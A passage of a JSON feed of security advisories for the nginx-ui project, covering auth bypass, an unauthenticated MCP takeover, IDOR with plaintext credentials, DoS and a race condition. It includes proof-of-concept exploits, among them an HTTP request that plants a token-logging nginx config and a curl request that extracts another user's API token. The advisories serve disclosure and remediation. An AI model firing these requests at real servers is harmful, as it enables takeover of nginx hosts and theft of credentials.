-- potentially containing sensitive request data, IP addresses, and authentication tokens\n3. **Gains interactive terminal access** -- if the administrator has not enabled OTP/2FA, the attacker obtains a full PTY shell on the server, achieving Remote Code Execution\n4. **Triggers system operations** -- including nginx reload/restart and binary upgrades\n\nThe attack requires no privileges and no knowledge of the victim's credentials. The only user interaction needed is visiting a webpage.\n\n## Remediation\n\n1. Implement proper origin validation in all WebSocket upgraders:\n\n```go\nvar upgrader = websocket.Upgrader{\n    CheckOrigin: func(r *http.Request) bool {\n        origin := r.Header.Get(\"Origin\")\n        return isAllowedOrigin(origin)\n    },\n}\n```\n\n2. Set secure cookie attributes:\n```typescript\ncookies.set('token', v, { maxAge: 86400, sameSite: 'strict', secure: true })\n```\n\n3. Add CSRF token validation to WebSocket upgrade requests as defense-in-depth.\n\nA patch is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-21T15:13:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-78mf-482w-62qj","https://nvd.nist.gov/vuln/detail/CVE-2026-34403","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5","https://github.com/advisories/GHSA-78mf-482w-62qj"],"source_kind":"github","identifiers":["GHSA-78mf-482w-62qj","CVE-2026-34403"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-21T16:00:08.947Z","updated_at":"2026-10-07T14:03:50.176Z","epss_percentage":0.00221,"epss_percentile":0.11551,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OG1mLTQ4MnctNjJxas4ABVgn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OG1mLTQ4MnctNjJxas4ABVgn","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20260316053337-1a9cd29a3082","vulnerable_version_range":"\u003c 1.9.10-0.20260316053337-1a9cd29a3082"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OG1mLTQ4MnctNjJxas4ABVgn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14MjM0LXg1dnEtY2Myds4ABVgl","url":"https://github.com/advisories/GHSA-x234-x5vq-cc2v","title":"Nginx-UI: Disabled users retain full API access through previously issued bearer tokens","description":"### Summary\n\nA user who was disabled by an administrator can use previously issued API tokens for up to the token lifetime. In practice, disabling a compromised account does not actually terminate that user’s access, so an attacker who already stole a JWT can continue reading and modifying protected resources after the account is marked disabled.\n\nSince tokens can be used to create new accounts, it is possible the disabled user to maintain the privilege.\n\n### Details\n\nThe application exposes an account-level disable control through the users management API. Login process correctly enforces that control:\nhttps://github.com/0xJacky/nginx-ui/blob/6ec542fd97abf2c5950f374f78a32938ad0030e6/internal/user/login.go#L29-L31\n\nHowever, token-based authentication does not enforce the same check (This code validates token structure and expiry, but returns that user object without checking `user.Status`.):\nhttps://github.com/0xJacky/nginx-ui/blob/6ec542fd97abf2c5950f374f78a32938ad0030e6/internal/user/user.go#L44-L139\n\nThere’s also no token revocation feature, unlike when a password is changed:\nhttps://github.com/0xJacky/nginx-ui/blob/6ec542fd97abf2c5950f374f78a32938ad0030e6/api/user/user.go#L38-L51\n\nAs a result, a disabled user can continue to have full API access. In particular, since that includes account creation, they can create a new account and keep operating even after the JWT expires.\n\n### PoC\n\nThe issue was validated with version 2.3.3 using the `uozi/nginx-ui:sha-c92ec0a` docker image.\n\nView the PoC video:\n\n\nhttps://github.com/user-attachments/assets/7a5175cb-2f79-4c1b-adad-e7d0bf2ea2bd\n\n\n\n### Impact\n\nAdministrators who rely on \"disable user\" as an authentication or authorization control can be bypassed.\n\nThe disabled user can keep reading sensitive configuration and executing authenticated state-changing actions allowed to that account.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-21T15:00:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-x234-x5vq-cc2v","https://nvd.nist.gov/vuln/detail/CVE-2026-33031","https://github.com/0xJacky/nginx-ui/commit/7b66578adb47bbec839b621a4666495249379174","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://github.com/advisories/GHSA-x234-x5vq-cc2v"],"source_kind":"github","identifiers":["GHSA-x234-x5vq-cc2v","CVE-2026-33031"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-21T16:00:08.947Z","updated_at":"2026-09-25T12:04:18.109Z","epss_percentage":0.00393,"epss_percentile":0.30643,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MjM0LXg1dnEtY2Myds4ABVgl","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MjM0LXg1dnEtY2Myds4ABVgl","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":"1.9.10-0.20260314152518-7b66578adb47","vulnerable_version_range":"\u003c 1.9.10-0.20260314152518-7b66578adb47"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MjM0LXg1dnEtY2Myds4ABVgl/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oNmMyLXgybTItbXdoZs4ABUdN","url":"https://github.com/advisories/GHSA-h6c2-x2m2-mwhf","title":"nginx-ui's Unauthenticated MCP Endpoint Allows Remote Nginx Takeover","description":"### Summary\nThe nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: `/mcp` and `/mcp_message`. While `/mcp` requires both IP whitelisting and authentication (`AuthRequired()` middleware), the `/mcp_message` endpoint only applies IP whitelisting - and the default IP whitelist is empty, which the middleware treats as \"allow all\". This means any network attacker can invoke all MCP tools without authentication, including restarting nginx, creating/modifying/deleting nginx configuration files, and triggering automatic config reloads - achieving complete nginx service takeover.\n\n### Details\n#### Vulnerable Code\n\n**`mcp/router.go:9-17` - Auth asymmetry between endpoints**\n\n```go\nfunc InitRouter(r *gin.Engine) {\n\tr.Any(\"/mcp\", middleware.IPWhiteList(), middleware.AuthRequired(),\n\t\tfunc(c *gin.Context) {\n\t\t\tmcp.ServeHTTP(c)\n\t\t})\n\tr.Any(\"/mcp_message\", middleware.IPWhiteList(),\n\t\tfunc(c *gin.Context) {\n\t\t\tmcp.ServeHTTP(c)\n\t\t})\n}\n```\n\nThe `/mcp` endpoint has `middleware.AuthRequired()`, but `/mcp_message` does not. Both endpoints route to the same `mcp.ServeHTTP()` handler, which processes all MCP tool invocations.\n\n**`internal/middleware/ip_whitelist.go:11-26` - Empty whitelist allows all**\n\n```go\nfunc IPWhiteList() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tclientIP := c.ClientIP()\n\t\tif len(settings.AuthSettings.IPWhiteList) == 0 || clientIP == \"\" || clientIP == \"127.0.0.1\" || clientIP == \"::1\" {\n\t\t\tc.Next()\n\t\t\treturn\n\t\t}\n\t\t// ...\n\t}\n}\n```\n\nWhen `IPWhiteList` is empty (the default - `settings/auth.go` initializes `Auth{}` with no whitelist), the middleware allows all requests through. This is a fail-open design.\n\n#### Available MCP Tools (all invocable without auth)\n\nFrom `mcp/nginx/`:\n- `restart_nginx` - restart the nginx process\n- `reload_nginx` - reload nginx configuration\n- `nginx_status` - read nginx status\n\nFrom `mcp/config/`:\n- `nginx_config_add` - create new nginx config files\n- `nginx_config_modify` - modify existing config files\n- `nginx_config_list` - list all configurations\n- `nginx_config_get` - read config file contents\n- `nginx_config_enable` - enable/disable sites\n- `nginx_config_rename` - rename config files\n- `nginx_config_mkdir` - create directories\n- `nginx_config_history` - view config history\n- `nginx_config_base_path` - get nginx config directory path\n\n#### Attack Scenario\n\n1. Attacker sends HTTP requests to `http://target:9000/mcp_message` (default port)\n2. No authentication is required - IP whitelist is empty by default\n3. Attacker invokes `nginx_config_modify` with `relative_path=\"nginx.conf\"` to rewrite the main nginx configuration (e.g., inject a reverse proxy that logs `Authorization` headers)\n4. `nginx_config_add` auto-reloads nginx (`config_add.go:74`), or attacker calls `reload_nginx` directly\n5. All traffic through nginx is now under attacker control - requests intercepted, redirected, or denied\n\n\n### PoC\n**1. The auth asymmetry** is visible by comparing the two route registrations in `mcp/router.go`:\n\n```go\n// Line 10 - /mcp requires auth:\nr.Any(\"/mcp\", middleware.IPWhiteList(), middleware.AuthRequired(), func(c *gin.Context) { mcp.ServeHTTP(c) })\n\n// Line 14 - /mcp_message does NOT:\nr.Any(\"/mcp_message\", middleware.IPWhiteList(), func(c *gin.Context) { mcp.ServeHTTP(c) })\n```\n\nBoth call the same `mcp.ServeHTTP(c)` handler, which dispatches all tool invocations.\n\n**2. The IP whitelist defaults to empty**, allowing all IPs. From `settings/auth.go`:\n\n```go\nvar AuthSettings = \u0026Auth{\n    BanThresholdMinutes: 10,\n    MaxAttempts:         10,\n    // IPWhiteList is not initialized - defaults to nil/empty slice\n}\n```\n\nAnd the middleware at `internal/middleware/ip_whitelist.go:14` passes all requests when the list is empty:\n\n```go\nif len(settings.AuthSettings.IPWhiteList) == 0 || clientIP == \"\" || clientIP == \"127.0.0.1\" || clientIP == \"::1\" {\n    c.Next()\n    return\n}\n```\n\n**3. Config writes auto-reload nginx.** From `mcp/config/config_add.go`:\n\n```go\nerr := os.WriteFile(path, []byte(content), 0644)  // Line 69: write config file\n// ...\nres := nginx.Control(nginx.Reload)                 // Line 74: immediate reload\n```\n\n**4. Exploit request.** An attacker with network access to port 9000 can invoke any MCP tool via the SSE message endpoint. For example, to create a malicious nginx config that logs authorization headers:\n\n```http\nPOST /mcp_message HTTP/1.1\nContent-Type: application/json\n\n{\n  \"jsonrpc\": \"2.0\",\n  \"method\": \"tools/call\",\n  \"params\": {\n    \"name\": \"nginx_config_add\",\n    \"arguments\": {\n      \"name\": \"evil.conf\",\n      \"content\": \"server { listen 8443; location / { proxy_pass http://127.0.0.1:9000; access_log /etc/nginx/conf.d/tokens.log; } }\",\n      \"base_dir\": \"conf.d\",\n      \"overwrite\": true,\n      \"sync_node_ids\": []\n    }\n  },\n  \"id\": 1\n}\n```\n\nNo `Authorization` header is needed. The config is written and nginx reloads immediately.\n\n### Impact\n- **Complete nginx service takeover**: An unauthenticated attacker can create, modify, and delete any nginx configuration file within the config directory, then trigger immediate reload/restart\n- **Traffic interception**: Attacker can rewrite server blocks to proxy all traffic through an attacker-controlled endpoint, capturing credentials, session tokens, and sensitive data in transit\n- **Service disruption**: Writing an invalid config and triggering reload takes nginx offline, affecting all proxied services\n- **Configuration exfiltration**: All existing nginx configs are readable via `nginx_config_get`, revealing backend topology, upstream servers, TLS certificate paths, and authentication headers\n- **Credential harvesting**: By injecting `access_log` directives with custom `log_format` patterns, the attacker can capture `Authorization` headers from administrators accessing nginx-ui, enabling escalation to the REST API\n\n### Remediation\n\nAdd `middleware.AuthRequired()` to the `/mcp_message` route:\n\n```go\nr.Any(\"/mcp_message\", middleware.IPWhiteList(), middleware.AuthRequired(),\n    func(c *gin.Context) {\n        mcp.ServeHTTP(c)\n    })\n```\n\nAdditionally, consider changing the IP whitelist default behavior to deny-all when unconfigured, rather than allow-all.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-03-30T16:43:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf","https://github.com/0xJacky/nginx-ui/blob/f89f8ff8223478988f7ed49bf1d3dbf2de44bf92/internal/middleware/ip_whitelist.go#L11-L26","https://github.com/0xJacky/nginx-ui/blob/f89f8ff8223478988f7ed49bf1d3dbf2de44bf92/mcp/router.go#L9-L17","https://nvd.nist.gov/vuln/detail/CVE-2026-33032","https://websec.net/blog/cve-2026-33032-unauthenticated-nginx-ui-mcp-takeover-69e1200f9fceb1f3fbe9c47f","https://github.com/advisories/GHSA-h6c2-x2m2-mwhf"],"source_kind":"github","identifiers":["GHSA-h6c2-x2m2-mwhf","CVE-2026-33032"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.334Z","updated_at":"2026-09-25T12:04:54.006Z","epss_percentage":0.02523,"epss_percentile":0.84178,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNmMyLXgybTItbXdoZs4ABUdN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oNmMyLXgybTItbXdoZs4ABUdN","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.99"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNmMyLXgybTItbXdoZs4ABUdN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01aGYyLXZoajYtZ2o5bc4ABUdM","url":"https://github.com/advisories/GHSA-5hf2-vhj6-gj9m","title":"nginx-UI has Unencrypted Storage of DNS API Tokens and ACME Private Keys","description":"## Summary\n\nNginx-UI contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated user to access, modify, and delete resources belonging to other users. The application's base `Model` struct lacks a `user_id` field, and all resource endpoints perform queries by ID without verifying user ownership, enabling complete authorization bypass in multi-user environments.\n\n## Severity\n\n**High** - CVSS 3.1 Score: **8.8 (High)**\n\nVector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`\n\n**Note**: Original score was 7.5. The score was updated to 8.8 after discovering that sensitive data (DNS API tokens, ACME private keys) is stored in plaintext, which when combined with IDOR allows immediate credential theft without decryption.\n\n## Product\n\nnginx-ui\n\n## Affected Versions\n\nAll versions up to and including v2.3.3\n\n## CWE\n\nCWE-639: Authorization Bypass Through User-Controlled Key\n\n## Description\n\n### Exposed DNS Provider Credentials\n\nThe `dns.Config` structure (`internal/cert/dns/config_env.go`) contains API credentials:\n\n```go\ntype Configuration struct {\n    Credentials map[string]string `json:\"credentials\"`  // API tokens here\n    Additional  map[string]string `json:\"additional\"`\n}\n```\n\n| Provider | Credential Fields | Impact if Leaked |\n|----------|------------------|------------------|\n| Cloudflare | `CF_API_TOKEN` | Full DNS zone control |\n| Alibaba Cloud DNS | `ALICLOUD_ACCESS_KEY`, `ALICLOUD_SECRET_KEY` | Full DNS control + potential IAM access |\n| Tencent Cloud DNS | `TENCENTCLOUD_SECRET_ID`, `TENCENTCLOUD_SECRET_KEY` | Full DNS control |\n| AWS Route53 | `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` | Route53 + potential AWS access |\n| GoDaddy | `GODADDY_API_KEY`, `GODADDY_API_SECRET` | DNS record modification |\n\n### Combined Attack: IDOR + Plaintext Storage\n\nWhen the IDOR vulnerability is combined with plaintext storage, attackers can directly extract API tokens from other users' resources:\n\n```\nAttack Chain:\n┌─────────────────────────────────────────────────────────────────┐\n│ 1. Attacker authenticates with low-privilege account            │\n│ 2. Uses IDOR to enumerate: /api/dns_credentials/1,2,3...      │\n│ 3. Reads plaintext API tokens directly from HTTP response       │\n│ 4. No decryption needed - tokens stored in cleartext            │\n│ 5. Uses stolen tokens to:                                       │\n│    - Modify DNS records (domain hijacking)                      │\n│    - Issue fraudulent SSL certificates                          │\n│    - Pivot to cloud infrastructure                              │\n└─────────────────────────────────────────────────────────────────┘\n```\n\n### PoC: Extracting Plaintext Credentials via IDOR\n\n```bash\n# Attacker with low-privilege token accessing admin's DNS credential\ncurl -H \"Authorization: $ATTACKER_TOKEN\" \\\n     https://nginx-ui.example.com/api/dns_credentials/1\n\n# Response contains PLAINTEXT API token (no decryption required):\n{\n    \"id\": 1,\n    \"name\": \"Production Cloudflare\",\n    \"provider\": \"cloudflare\",\n    \"config\": {\n        \"credentials\": {\n            \"CF_API_TOKEN\": \"yhyQ7xR...plaintext_token_visible...\"\n        }\n    }\n}\n```\n\n### Updated CVSS Score with Plaintext Storage\n\nThe plaintext storage increases the confidentiality impact:\n\n**CVSS 3.1 Score: 8.8 (High)**\n\nVector: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`\n\n- **Scope Changed (S:C)**: Impact extends to external services (DNS providers, cloud platforms)\n- **High Confidentiality (C:H)**: Plaintext API tokens immediately usable\n- **High Integrity (I:H)**: DNS records, certificates can be modified\n- **High Availability (A:H)**: Services can be disrupted via DNS/certificate manipulation\n\n---\n\n### Attack Scenario: Certificate Hijacking\n\n```\n1. Attacker creates low-privilege account on nginx-ui\n2. Uses IDOR to enumerate all DNS credentials: /api/dns_credentials/1,2,3...\n3. Steals Cloudflare API token from admin's credential\n4. Uses token to:\n   - Modify DNS records\n   - Issue fraudulent Let's Encrypt certificates\n   - Intercept traffic to victim domains\n```\n\n## Credit\n\nDiscovered by security researcher during authorized security audit.\n\n## Recommendation\n\n### Immediate Mitigation\n\n1. **Add User Ownership to Models**\n\n```go\n// model/model.go\ntype Model struct {\n    ID        uint64          `gorm:\"primary_key\" json:\"id\"`\n    UserID    uint64          `gorm:\"index\" json:\"user_id\"`  // Add this field\n    CreatedAt time.Time       `json:\"created_at\"`\n    UpdatedAt time.Time       `json:\"updated_at\"`\n    DeletedAt *gorm.DeletedAt `gorm:\"index\" json:\"deleted_at,omitempty\"`\n}\n```\n\n2. **Filter Queries by Current User**\n\n```go\n// api/certificate/dns_credential.go\nfunc GetDnsCredential(c *gin.Context) {\n    id := cast.ToUint64(c.Param(\"id\"))\n    currentUser := c.MustGet(\"user\").(*model.User)\n\n    d := query.DnsCredential\n    dnsCredential, err := d.Where(\n        d.ID.Eq(id),\n        d.UserID.Eq(currentUser.ID),  // Add user filter\n    ).First()\n\n    if err != nil {\n        cosy.ErrHandler(c, err)\n        return\n    }\n    // ...\n}\n```\n\n3. **Add Authorization Middleware**\n\n```go\n// middleware/authorization.go\nfunc RequireOwnership(resourceType string) gin.HandlerFunc {\n    return func(c *gin.Context) {\n        currentUser := c.MustGet(\"user\").(*model.User)\n        resourceID := cast.ToUint64(c.Param(\"id\"))\n\n        // Check if resource belongs to current user\n        ownerID, err := getResourceOwner(resourceType, resourceID)\n        if err != nil || ownerID != currentUser.ID {\n            c.AbortWithStatusJSON(http.StatusForbidden, gin.H{\n                \"message\": \"Access denied\",\n            })\n            return\n        }\n        c.Next()\n    }\n}\n```\n\n### Database Migration\n\n```sql\n-- Add user_id column to all resource tables\nALTER TABLE dns_credentials ADD COLUMN user_id BIGINT;\nALTER TABLE certs ADD COLUMN user_id BIGINT;\nALTER TABLE acme_users ADD COLUMN user_id BIGINT;\nALTER TABLE sites ADD COLUMN user_id BIGINT;\nALTER TABLE streams ADD COLUMN user_id BIGINT;\nALTER TABLE configs ADD COLUMN user_id BIGINT;\n\n-- Set default owner for existing resources\nUPDATE dns_credentials SET user_id = 1 WHERE user_id IS NULL;\nUPDATE certs SET user_id = 1 WHERE user_id IS NULL;\n\n-- Add foreign key constraint\nALTER TABLE dns_credentials ADD CONSTRAINT fk_dns_credentials_user\n    FOREIGN KEY (user_id) REFERENCES users(id);\n```\n\n### Long-term Improvements\n\n1. Implement role-based access control (RBAC)\n2. Add audit logging for resource access\n3. Implement resource sharing functionality with explicit permissions\n4. Add integration tests for authorization checks\n\n---\n\n## Remediation for Plaintext Storage\n\n### Immediate Fix: Encrypt Sensitive Fields\n\nApply the same `serializer:json[aes]` pattern used for S3 credentials to DNS and ACME data:\n\n**model/dns_credential.go:**\n```go\ntype DnsCredential struct {\n    Model\n    Name         string      `json:\"name\"`\n    Config       *dns.Config `json:\"config,omitempty\" gorm:\"serializer:json[aes]\"` // Add AES encryption\n    Provider     string      `json:\"provider\"`\n    ProviderCode string      `json:\"provider_code\" gorm:\"index\"`\n}\n```\n\n**model/acme_user.go:**\n```go\ntype AcmeUser struct {\n    Model\n    // ...\n    Key PrivateKey `json:\"-\" gorm:\"serializer:json[aes]\"` // Add AES encryption\n    // ...\n}\n```\n\n### Data Migration\n\nExisting plaintext data must be re-saved to trigger encryption:\n\n```go\nfunc MigrateSensitiveData() error {\n    // Migrate DNS credentials\n    var dnsCreds []model.DnsCredential\n    query.DnsCredential.Find(\u0026dnsCreds)\n    for _, cred := range dnsCreds {\n        query.DnsCredential.Save(\u0026cred) // Re-save triggers AES encryption\n    }\n\n    // Migrate ACME users\n    var acmeUsers []model.AcmeUser\n    query.AcmeUser.Find(\u0026acmeUsers)\n    for _, user := range acmeUsers {\n        query.AcmeUser.Save(\u0026user)\n    }\n\n    return nil\n}\n```\n\n### Summary of Required Changes\n\n| File | Line | Current | Fix |\n|------|------|---------|-----|\n| `model/dns_credential.go` | 7 | `serializer:json` | `serializer:json[aes]` |\n| `model/acme_user.go` | Key field | `serializer:json` | `serializer:json[aes]` |\n\n## References\n\n- [CWE-639: Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)\n- [OWASP IDOR Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html)\n- [PortSwigger: IDOR Vulnerabilities](https://portswigger.net/web-security/access-control/idor)\n\n## Disclosure Timeline\n\n- **2026-03-13**: Vulnerability discovered through source code audit\n- **2026-03-13**: Vulnerability successfully reproduced in local Docker environment\n- **2026-03-13**: All IDOR operations verified: READ, MODIFY, DELETE\n- **2026-03-13**: Security advisory prepared\n- **[Pending]**: Report submitted to nginx-ui maintainers\n- **[Pending]**: CVE ID requested\n- **[Pending]**: Patch developed and tested\n- **[Pending]**: Public disclosure (21-90 days after vendor notification)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-30T16:41:07.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-5hf2-vhj6-gj9m","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://nvd.nist.gov/vuln/detail/CVE-2026-33030","https://github.com/advisories/GHSA-5hf2-vhj6-gj9m"],"source_kind":"github","identifiers":["GHSA-5hf2-vhj6-gj9m","CVE-2026-33030"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.335Z","updated_at":"2026-10-05T15:04:26.855Z","epss_percentage":0.00379,"epss_percentile":0.29512,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01aGYyLXZoajYtZ2o5bc4ABUdM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01aGYyLXZoajYtZ2o5bc4ABUdM","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/nginx-ui","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.99"}],"purl":"pkg:go/github.com%2F0xJacky%2Fnginx-ui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01aGYyLXZoajYtZ2o5bc4ABUdM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jcDhyLThqdnctdjNxZ84ABUdL","url":"https://github.com/advisories/GHSA-cp8r-8jvw-v3qg","title":"nginx-ui Vulnerable to DoS via Negative Integer Input in Logrotate Interval","description":"### Summary\nAn input validation vulnerability in the logrotate configuration allows an authenticated user to cause a complete Denial of Service (DoS). By submitting a negative integer for the rotation interval, the backend enters an infinite loop or an invalid state, rendering the web interface unresponsive.\n\n### Details\nThe vulnerability exists in the handler for the POST /api/settings endpoint. Specifically, the logrotate.interval field is accepted as a signed integer without lower-bound verification. When a negative value is processed by the backend logic responsible for scheduling or calculating the next rotation, it triggers a non-terminating loop. This consumes CPU resources and prevents the Go web server from handling further concurrent requests.\n\n**Environment:**\n- OS: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- nginx-ui version: 2.3.3 (513) e5da6dd (go1.26.0 linux/amd64)\n- Deployment: Docker container\n- Run Command: \n```\ndocker run -dit \\\n  --name=nginx-ui \\\n  --restart=always \\\n  -v /mnt/user4/appdata/nginx:/etc/nginx \\\n  -v /mnt/user4/appdata/nginx-ui:/etc/nginx-ui \\\n  -v /var/run/docker.sock:/var/run/docker.sock \\\n  -p 8080:80 -p 8443:443 \\\n  uozi/nginx-ui:latest\n```\n\n### PoC\n1. Authenticate to the nginx-ui dashboard.\n2. Send a POST request to /api/settings (using Burp Suite, Postman, or curl).\n3. Set the payload as follows:\n```\n.\n.\n.\n{\n  \"logrotate\": {\n    \"enabled\": true,\n    \"cmd\": \"logrotate /etc/logrotate.d/nginx\",\n    \"interval\": -1\n  }\n}\n.\n.\n.\n```\n4. Observe that the web server stops responding to all subsequent requests immediately after the injection.\n\u003cimg width=\"1041\" height=\"390\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b746a91a-dd63-4f5e-b1a8-382b9d08e181\" /\u003e\n\n### Impact\nThis is a High-availability vulnerability (CWE-20: Improper Input Validation). Any authenticated user with access to settings can permanently hang the service.\n\nA patched version of nginx-ui  is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-30T16:38:38.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.9,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-cp8r-8jvw-v3qg","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","https://nvd.nist.gov/vuln/detail/CVE-2026-33029","https://github.com/advisories/GHSA-cp8r-8jvw-v3qg"],"source_kind":"github","identifiers":["GHSA-cp8r-8jvw-v3qg","CVE-2026-33029"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-30T17:00:11.335Z","updated_at":"2026-09-25T12:04:54.006Z","epss_percentage":0.00477,"epss_percentile":0.38536,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcDhyLThqdnctdjNxZ84ABUdL","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jcDhyLThqdnctdjNxZ84ABUdL","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.99"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jcDhyLThqdnctdjNxZ84ABUdL/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNDY4LXhjbTYtZnhnNM4ABUdK","url":"https://github.com/advisories/GHSA-m468-xcm6-fxg4","title":"nginx-ui has Race Condition that Leads to Persistent Data Corruption and Service Collapse","description":"### Summary\nThe `nginx-ui` application is vulnerable to a **Race Condition**. Due to the complete absence of synchronization mechanisms (Mutex) and non-atomic file writes, concurrent requests lead to the severe corruption of the primary configuration file (`app.ini`). This vulnerability results in a persistent Denial of Service (DoS) and introduces a non-deterministic path for **Remote Code Execution (RCE)** through configuration cross-contamination.\n\n### Details\nThe vulnerability exists because the settings update pipeline does not implement any synchronization primitives. When multiple requests reach the handler simultaneously:\n1.  **Memory Corruption**: `ProtectedFill()` modifies shared global singleton pointers without thread-safety, leading to inconsistent states in memory.\n2.  **File Corruption**: The underlying library (`gopkg.in/ini.v1`) performs direct overwrites. Concurrent write operations interleave at the OS level, resulting in `app.ini` files with empty leading lines, truncated fields, or partially overwritten configuration keys.\n3.  **State Persistent Failure**: Depending on which bytes are corrupted, the application either fails its \"is-installed\" check (redirecting to `/install`) or encounters a fatal error during boot/runtime that prevents the process from responding to any further requests.\n\n**Environment:**\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container\n\n### PoC\n0. Check original app.ini file valid state:\n\u003cimg width=\"524\" height=\"367\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d9688f76-7fe7-46ea-9eb9-c55bf40918a6\" /\u003e\n\n1. Log in to the `nginx-ui` dashboard.\n2. Navigate to Preferences and update settings. Capture a `POST /api/settings` request and send it to **Burp Suite Intruder**.\n3. Configure the attack with **Null payloads** (to test basic concurrency) or a **Fuzzing list** (to test data-driven corruption).\n4. Set the **Resource Pool** to 20-50 concurrent requests.\n\u003cimg width=\"1188\" height=\"776\" alt=\"image\" src=\"https://github.com/user-attachments/assets/403eef43-2bc6-4651-8802-15ddcb4f7631\" /\u003e\n\n5. **Observation (In-flight corruption)**: Monitor the `app.ini` file. You will observe the file being written with empty leading lines or incomplete key-value pairs. \n\n- \u003cimg width=\"1316\" height=\"390\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d99553f7-d253-4525-9b45-f59994e69180\" /\u003e\n------------------------------------------------\n\n- \u003cimg width=\"1368\" height=\"709\" alt=\"image\" 